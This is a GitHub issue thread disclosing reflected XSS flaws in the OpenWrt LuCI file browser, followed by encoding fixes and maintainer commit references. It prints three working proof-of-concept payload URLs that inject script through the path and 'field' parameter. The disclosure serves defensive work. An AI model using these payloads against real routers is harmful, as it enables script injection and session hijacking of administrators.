### ISSUE TITLE
Reflected XSS at luci/admin/filebrowser in path and 'field' parameter

### ISSUE THREAD

**Issue by macintorsten** [openwrt/luci#1731]
The file browser is vulnerable to a few XSS issues. One in the *path* (first one) and the two other use the *field* parameter.

**First** (*path*)
``http://192.168.56.2/cgi-bin/luci/admin/filebrowser/boot/grub%2500">`-alert(1)</script><script>` ``

**Second** (*field* parameter - reflected in &lt;script&gt;-context)
``http://192.168.56.2/cgi-bin/luci/admin/filebrowser/boot/grub?field=')}}%0aalert(1)%0afunction%20a(path,input){if%20(true){//``

**Third** (*field* parameter)
``http://192.168.56.2/cgi-bin/luci/admin/filebrowser/boot/grub?field=">`-alert`1`]]></script><svg><script>`<![CDATA[``

First and third should be blocked by IE XSS filter. Replace http://192.168.56.2/cgi-bin/luci/ with URL to luci.

Tested on:
> Powered by LuCI Master (git-18.096.36616-14da6e8) / OpenWrt SNAPSHOT r6626-f27336e

**Comment by macintorsten** [comment]
To fix first and third, which are reflections in <a href=-context, i.e html attribute, the value should probably be url-encoded then HTML entity-encoded. 

To fix the second, the value should be escaped / encoded so it's not possible to escape the javascript string context OR end the script tag with `</script>`.

**Comment by jow-** [comment]
5c31937a0f0bf8fa2f0161cadae9688fff9c227e

**Comment by jow-** [comment]
From my preliminary investigation this only affects leaf nodes because other invalid urls are running into a 404 code paths. This particular attack vector should've been closed with b194b8882e4d335a265f44c478ea8e3d7b2a99fc

**Comment by macintorsten** [comment]
@jow- I tested it a bit more and it seems to work. Unless you know somewhere else this should be patch, shall the bug be closed?

**Comment by macintorsten** [comment]
Closing.
